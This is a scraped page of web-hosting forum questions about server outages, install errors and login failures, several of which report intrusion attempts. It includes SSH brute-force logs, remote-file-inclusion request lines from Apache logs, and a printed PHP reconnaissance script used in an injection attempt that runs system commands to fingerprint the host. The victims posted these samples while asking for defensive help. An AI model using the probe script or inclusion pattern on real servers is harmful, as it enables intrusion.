Attempt To Install RoR, Libsafe Stops Me
Apr 12, 2008
whenever I attempt to install RoR, libsafe stops me, how do I diable libsafe so I can install RoR, then re-enable libsafe.
[root@server1 ~]# gem install rails --include-dependencies
Libsafe version 2.0.16
Detected an attempt to write across stack boundary.
Terminating /usr/bin/ruby-bin.
uid=0 euid=0 pid=20960
Call stack:
0x4c0e6871 /lib/libsafe.so.2.0.16
0x4c0e6c5d /lib/libsafe.so.2.0.16
0x80549b8 /usr/bin/ruby-bin
0x8054a52 /usr/bin/ruby-bin
0x80556af /usr/bin/ruby-bin .....
View 0 Replies
ADVERTISEMENT
Mar 24, 2009
I have a very strange problem. Yesterday morning I got a "server down" alert. Restarted httpd and everything run ok ... until today morning, the same problem again.
Symptoms:
1. The webserver did not stop working, it just took too much time to respond.
2. I cannot find anything suspicious in the logs.
3. I started to log the number of apache processes in 4 minutes interval, it did not increase during the failure but remained at a very reasonable number.
4. Now, almost 3 hrs from the last failure, there are 36 apache processes, each eating 14M RAM, server has 4GB ram total, no swapping, almost 3GB are free (cached).
The question is.
How should I prepare for the expected tommorow failure, to be able finaly localise the problem?
View 7 Replies
View Related
Apr 21, 2009
I have 3 servers ServerA(Web, mail), ServerB(MySQL+Master replication), ServerC(Mysqlslave+web)
It happens that my website stops responding for few mins and then it comes back again automatically. I checked the server logs but I couldn't find any suspicious.
Also, while the website is not accessible when I try to connect internally from ServerC to ServerA or ServerB using SSH. It takes lots of time (approx more than 60 seconds) to connect. When website starts working SSH is also working fine.
This is very complicated for me. Can anyone let me know what should be the problem or how can I find root cause of this problem?
View 3 Replies
View Related
May 29, 2008
The problem is that it switches from running to mounted without me having anything to do with it. It seems to be quite randomly, for example this morning at 1.42 am. This happens once a day and stops my vps and therefore my website - which is quite annoying.
I checked for log files or anything, but there was nothing mentioning resources or anything.
Does anyone have a clue what this might be? If I cannot fix the problem there is still the opportunity to just start the vps once it goes to status mounted. How would I automate this?
I am using Virtuozzo and Plesk.
View 9 Replies
View Related
Jun 7, 2007
i have a VPS on which i host one of my Proxy site and nothing else (no databases, no emails, just the usual proxy files needed).
just today it stopped working it is showing the Centos Page .the URL is [url]
here are the steps that i have taken till now without success:
1. restarted the server
2. stopped and restarted some critical services like httpd etc.
3. restarted my free crappy control panel also Ravencore
but all without success
if u feel that u can help me out then can tell u my webmin root password also via PM (u must be a reputed member).
View 9 Replies
View Related
Mar 19, 2008
I have reported this to BurstNET admin/abuse/NOC and have added a line to block them for now.
Does this belong to anyone??? Nslookup/dig reveals nothing.
This is my /var/log/messages
Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2
Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2
Mar 19 19:24:52 ginger sshd[11567]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2
Mar 19 19:24:53 ginger sshd[11569]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2
Mar 19 19:24:55 ginger sshd[11571]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2
Mar 19 19:24:57 ginger sshd[11573]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - !POSSIBLE BREAK-IN ATTEMPT
View 7 Replies
View Related
Feb 22, 2007
my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.
[url]
[url]
[url]
[url]
[url]
I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.
Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.
View 1 Replies
View Related
Jan 31, 2007
I have started seeing the following error in the Event Viewer every day:
"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."
The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?
View 3 Replies
View Related
Sep 13, 2007
see the log entries below:
LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i""
1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"
1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"
What can you say from the above log entries?
View 1 Replies
View Related
Jul 26, 2007
I have an account on my cPanel server with a cgi script in it wich works just fine under normal circumstances. I setup mod_perl and got it working just fine with the script. I edited the .htaccess file to do a 301 redirect and added the line “RewriteEngine on” and then whenever I try to access the cgi script I get:
Quote:
Forbidden
You don't have permission to access………..
If I disable mod_perl or remove the line “RewriteEngine on” from .htaccess it works fine.
In the cPanel error log I have:
Quote:
Options FollowSymLinks or SymLinksIfOwnerMatch is off which implies that RewriteRule directive is forbidden
But in htaccess I already have the line "Options +FollowSymLinks" which is part of the 301 redirect code.
View 2 Replies
View Related
Jul 20, 2008
I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.
I have pasted the code below.
Please suggest what can be done in this case.
Regards
Gagandeep
+++++++++++
The person tried to use different IPs and different websites to execute the code.
URL >> IP
[url]
[url]
[url]
ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156
There are many such queries under my logs.
The person is using different IPs, so, i can't even block that many IPs.
++++++++++++
The CODE
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }
echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>
View 5 Replies
View Related
May 30, 2007
Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?
Is this stuff largely ignored?
Is anyone else doing this?
Is there an easier way?
View 14 Replies
View Related
Jul 8, 2007
A new client has just opened up an account and the first thing hes installed at a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them their root kits of some sort. Amd I correct in thinking this?
The account has been susspended for the time being.
View 12 Replies
View Related
Apr 3, 2008
Recently I've upgraded my MySQL server. I connect to it via a conection from NIC to NIC (Internal IP addresses). Since the upgrade/format, I've managed to get everything back to the way it was. Everything works fine for 15-20 minutes. Then the PHP server can no longer access the MySQL server.
I tried logging in from the PHP server, I get access denied. I then tried logging in locally, on the MySQL server and I get in fine...
It's not like it's a firewall issue though, it's strange...
I tried updating PHP/MySQL to a few releases, even the RC's to no avail...
Something to note is that when I try restarting MySQL it can take 4-5 minutes, sometimes not even complete.
View 2 Replies
View Related
Jan 4, 2008
I have a phpBB forum, which uses MySQl database.
For the last two months the forum has been going down every couple of days because the database service has been continuously stoped running on the server with no reason.
What can cause such a frequent database failures?
Can someone attack the forum/database/server in a way that will cause the above problem?
(there is a good reason I consider this possibility very seriously)
How can I prevent futher database failures?
View 2 Replies
View Related
Oct 1, 2007
Many, many people seem to be having the 2002 error over the past 24 hours on phpmyadmin with cpanel
Doing this edit to the config got it going for me:
[url]
View 2 Replies
View Related
Jun 9, 2009
I have not been able to login to my cPanel from my desktop which runs WinXP service Pack3. Both Firefox and Internet Explorer returns the following error message
Login Attempt Failed!
Also, I am unable to connect using Filezilla Client.
However, I am able to connect to the same cPanel on my colleague's desktop which runs WinXP service Pack3 using Firefox browser or IE. We both share the same internet modem.
- I have cleared all the cookies and private data on my desktop. Still the problem persist.
- I changed to a different user on my desktop, but still could not login.
- I changed my desktop IP address but still I could not log in.
I use DSLinux from within Innotek Virtual Box and I was able to login to the same cPanel with the same details that were rejected under WinXP.
Please anyone with a solution should please advise me on what to do. Thanks in advance.
It is not convenient going to my colleagues desk to access my cPanel.
View 15 Replies
View Related
May 18, 2009
Code:
Mon May 18 15:17:08 2009 lfd: *Suspicious File* /tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan [someuser:someuser
] - Suspicious directory
The 'someuser' is a legitimate user on the server, an auto body website setup last October.
The content of the directory:
Quote:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/CPAN]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 361 May 16 17:54 MyConfig.pm
File content:
Code:
$CPAN::Config->{'cpan_home'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan";
$CPAN::Config->{'build_dir'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/build";
$CPAN::Config->{'histfile'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/histfile";
$CPAN::Config->{'keep_source_where'} = "/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpan/sources";
1;
__END__
Code:
root@server [/tmp/perl_install.work.TLoX0YtaJBrzShwA/.cpcpan/STABLE]# ls -lh
total 3.0K
drwx------ 2 someuser someuser 1.0K May 16 17:54 ./
drwx------ 3 someuser someuser 1.0K May 16 17:54 ../
-rw-r--r-- 1 someuser someuser 735 May 16 17:54 modules.versions
View 0 Replies
View Related
Jun 24, 2008
I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.
We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".
We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.
Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )
View 7 Replies
View Related
Jun 4, 2008
one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to
GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"
View 0 Replies
View Related
Mar 29, 2009
I am having a very strange problem with 2 different cPanel accounts on a server with 500-600 accounts. For some reason after a day or two the mysql username/password stops working. We have tried changing the MySQL user and the password with no success. The log does not indicate that the MySQL password was changed in any way. Only these 2 accounts are affected and this problem occurred at least half dozen times each.
Again: these are two different accounts with 2 different MySQL users that after a while stop working (I am unable to determine if they stop working at the same time b/c they belong to different customers). When we reset the user (with the same pass) it works for a day or two. I have checked to connect not only from PHP but also from shell when it's down: it also doesn't work so this is a pure MySQL problem.
Also on the server we have Fantastico.
View 8 Replies
View Related
Jul 21, 2014
Out of nowhere apache stops working, and I have to restart the httpd service that restablesca
The message it throws is "Service Unavailable"
The server is a CentOS Linux Centos 6.5
It has 24 cores and 24 GB RAM
These are the values ​​that I have in httpd.conf
Timeout 60
KeepAlive Off
MaxKeepAliveRequests 100
KeepAliveTimeout 15
[Code]....
View 3 Replies
View Related
Nov 26, 2008
I keep seeing sa login failure on Event viewer Application log for MS SQL 2005. I'm tired of blocking off the failed attempt ip. A huge portion of them seem to come from China and Estern Euro. Should i just block off those region? Is there a better way for securing SQL2005?
View 1 Replies
View Related
Jan 2, 2007
Currently having a problem with proftpd on my centos plesk 8.1 server.
During large uploads, lets say around 10 MB the FTP connection fails within 5 minutes or so saying:
"A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond."
I have asked for help from my server provider but they have tried and are now unable to help.
I currently have the APF firewall in my server.
Has anyone experienced this?
Below is the APF config file that i currently have & the proftpd config files that i have, if anyone can help it would be really really appreciated
APF CONFIG:
Code:
#!/bin/sh
#
# APF 0.9.6 [apf@r-fx.org]
#
# NOTE: This file should be edited with word/line wrapping off,
# if your using pico please start it with the -w switch
# (e.g: pico -w filename)
#
##
# [Devel Mode]
# !!! Do not leave set to (1) !!!
# When set to enabled; 5 minute cronjob is set to stop the firewall. Set
# this mode off (0) when firewall determined to be operating as desired.
##
# Set firewall cronjob (devel mode)
# 1 = enabled / 0 = disabled
DEVEL_MODE="0"
##
# [Main]
##
# The installation path of APF; this can be changed but it has not
# been tested what would happen.
INSTALL_PATH="/etc/apf"
# Untrusted Network interface(s); all traffic on defined interface will be
# subject to all firewall rules. This should be your internet exposed
# interfaces. Only one interface is accepted for each value.
# NOTE: The interfacing structure is being worked towards support of MASQ/NAT
IFACE_IN="eth0"
IFACE_OUT="eth0"
# Trusted Network interface(s); all traffic on defined interface(s) will by-pass
# ALL firewall rules, format is white space or comma seperated list.
IFACE_TRUSTED=""
# Enable virtual network subsystem; creats independent policy ruleset for each
# ip on a system (pulls data from 'ip addr list') to /etc/apf/vnet/ip.rules
# Template is located in the vnet/ folder for rule files. This feature can
# reduce apf start/stop performance and is not recommend for systems with more
# than 255 (/24) ip's. [0 = Disabled / 1 = Enabled]
SET_VNET="0"
# Support Monolithic kernel builds [no LKM's]. This mode of operation is
# not really supported and you use at your own risk.
SET_MONOKERN="0"
# Verifies that all inbound traffic is sourced from a defined local gateway MAC
# address. All other traffic that does not match this source MAC address will be
# rejected as untrusted traffic. It is quite trivial to forge a MAC address and as
# such this feature executes NO default accept policy against this MAC address.
VF_LGATE=""
# Verifies that the IF and IFACE_TRUSTED interfaces are actually routed (/sbin/route)
# to something. If not then chances are APF will not start properly if at all.
VF_ROUTE="1"
# Verifies that crond service is running when DEVEL_MODE=1; if not then APF will not
# try to load as if lock-up occures no cron service to flush firewall
VF_CROND="1"
# Verifies that the current system uptime is greater than this value before APF
# can activate. This is to prevent on-boot lockup issues or delays due to excessive
# amount of firewall rules. Value is in seconds; should you wish to disable this
# feature, simply set VF_UTIME to 0 value. !! NOTE: APF WILL NOT START ON IT's OWN;
# IT WILL EXIT WITH FATAL ERROR BELOW SET UPTIME !!
VF_UTIME="0"
##
# [Packet Filtering/Handling]
##
# How to handle TCP packet filtering?
#
# RESET (sends a tcp-reset; TCP/IP default)
# DROP (drop the packet; stealth ?)
# REJECT (reject the packet)
TCP_STOP="DROP"
# How to handle UDP packet filtering?
#
# RESET (sends a icmp-port-unreachable; TCP/IP default)
# DROP (drop the packet; stealth ?)
# REJECT (reject the packet)
# PROHIBIT (send an icmp-host-prohibited)
UDP_STOP="DROP"
# How to handle all other packet filtering? (icmp,arp,igmp)
#
# DROP (drop the packet)
# REJECT (reject the packet)
DSTOP="DROP"
# The sanity options control the way packets are scrutinized as
# they flow through the firewall. The main PKT_SANITY option is a
# top level toggle for all SANITY options and provides general
# packet flag sanity as a pre-scrub for the other sanity options
PKT_SANITY="1"
# Block any packets that do not conform as VALID; this feature
# is safe for most but some may experience protocol issues with
# broken remote clients
PKT_SANITY_INV="0"
View 7 Replies
View Related
Jun 25, 2007
Just an FYI - we have been monitoring some attempts from europe. Here is a file that they were trying to include using a hole in PHPCoin's URL handler:
[URL removed] stringa.txt
The attempt was coming from linux.htd-information.dk
View 3 Replies
View Related
